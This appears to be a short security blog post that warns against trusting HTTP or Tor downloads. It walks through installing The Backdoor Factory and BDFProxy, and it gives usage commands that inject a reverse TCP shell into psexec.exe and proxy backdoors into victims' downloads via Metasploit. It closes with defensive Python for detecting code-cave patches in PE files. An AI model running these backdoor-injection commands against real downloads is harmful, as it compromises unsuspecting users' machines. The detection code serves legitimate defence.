Do Not Trust Your Download Even If It Is From a Trusted Source
Joshua Pitts developed a tool suite for injecting backdoors into executable files for Windows, Linux, Mac OS X and FreeBSD. The process is fully automatic, even if you do not know what a code cave is.
The tool suite is named The Backdoor Factory, and it comes with a proxy, BDFProxy, that injects the backdoor while the victim is downloading the binary. BDFProxy works with the HTTP protocol only.
Joshua Pitts discovered that one of the Tor network exit nodes was injecting code into binaries downloaded by victims through the Tor network. His blog shows how this is done, and the interview report discusses it.
How to install BDFactory on Kali Linux 1.0.9a?
BDFactory works very well with the Metasploit Framework.
apt-get update
apt-get dist-upgrade
apt-get autoclean
apt-get --purge autoremove
apt-get install python-pip
Install BDFactory :
cd ~
git clone https://github.com/secretsquirrel/the-backdoor-factory.git
cd the-backdoor-factory
./install.sh
To update :
./update.sh
Install BDFProxy :
cd ~
git clone https://github.com/secretsquirrel/BDFProxy.git
cd BDFProxy
./install.sh
To update :
./update.sh
Usage of BDFactory :
./backdoor.py -f psexec.exe -H 192.168.0.100 -P 8080 -s reverse_shell_tcp
Usage of BDFProxy :
nano bdfproxy.cfg
*change the settings when necessary
./bdf_proxy.py
msfconsole -r bdfproxy_msf_resource.rc
*if you are working with a Pineapple, you need to run ./wpBDF.sh to configure your environment
Conclusion
Don't trust a downloaded binary, even one from a trusted source, when it is delivered over HTTP. Likewise, download binaries over the Tor network with care.
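As an added defender-side example (my own code, not part of The Backdoor Factory or BDFProxy), the following Python checks a downloaded Windows PE file for the kind of header changes that redirecting the entry point into a code cave tends to leave behind: an entry point that no longer lies in .text, or a section that is both writable and executable. It assumes only the standard PE header layout and builds its own constructed sample images; a finding is a reason to inspect further, not proof of tampering, since packers and some linkers trigger the same heuristic.

```python
import struct

IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000

def parse_sections(data):
    """Return (entry_point_rva, [(name, virtual_address, virtual_size, flags), ...])."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    num_sections = struct.unpack_from("<H", data, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]
    opt_off = pe_off + 24                                     # optional header
    entry_rva = struct.unpack_from("<I", data, opt_off + 16)[0]
    sections = []
    for i in range(num_sections):
        off = opt_off + opt_size + i * 40                     # 40-byte section headers
        name = data[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        vsize, va = struct.unpack_from("<II", data, off + 8)
        flags = struct.unpack_from("<I", data, off + 36)[0]
        sections.append((name, va, vsize, flags))
    return entry_rva, sections

def suspicious_entry_point(data):
    """Heuristic findings for a code-cave style patch; an empty list means nothing found."""
    entry_rva, sections = parse_sections(data)
    findings, owner = [], None
    for name, va, vsize, flags in sections:
        if va <= entry_rva < va + vsize:
            owner = name
        if flags & IMAGE_SCN_MEM_EXECUTE and flags & IMAGE_SCN_MEM_WRITE:
            findings.append(f"section {name} is writable and executable")
    if owner is None:
        findings.append("entry point lies outside every section")
    elif owner != ".text":
        findings.append(f"entry point is in section {owner}, not .text")
    return findings

def build_sample_pe(entry_rva, sections):
    # Constructed test data only: a minimal, non-runnable PE32 image with the given section table.
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)       # e_lfanew = 0x40
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 224, 0x102)
    opt = bytearray(224)                                     # PE32 optional header
    struct.pack_into("<H", opt, 0, 0x10B)                    # PE32 magic
    struct.pack_into("<I", opt, 16, entry_rva)               # AddressOfEntryPoint
    table = b"".join(struct.pack("<8sIIIIIIHHI", n, vs, va, 0, 0, 0, 0, 0, 0, f)
                     for n, va, vs, f in sections)
    return dos + coff + bytes(opt) + table
```

Run `suspicious_entry_point(open(path, "rb").read())` on a real download to get the findings list; compare the file's hash against the vendor's published checksum as well, since this heuristic only catches one injection style.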
Please DO NOT use this tool suite for illegal purposes; otherwise, you will be put in jail.
That's all! See you.